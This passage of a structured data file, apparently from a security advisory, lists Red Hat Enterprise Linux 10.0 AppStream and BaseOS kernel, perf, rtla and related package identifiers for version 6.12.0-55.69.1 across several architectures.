"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"BaseOS-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
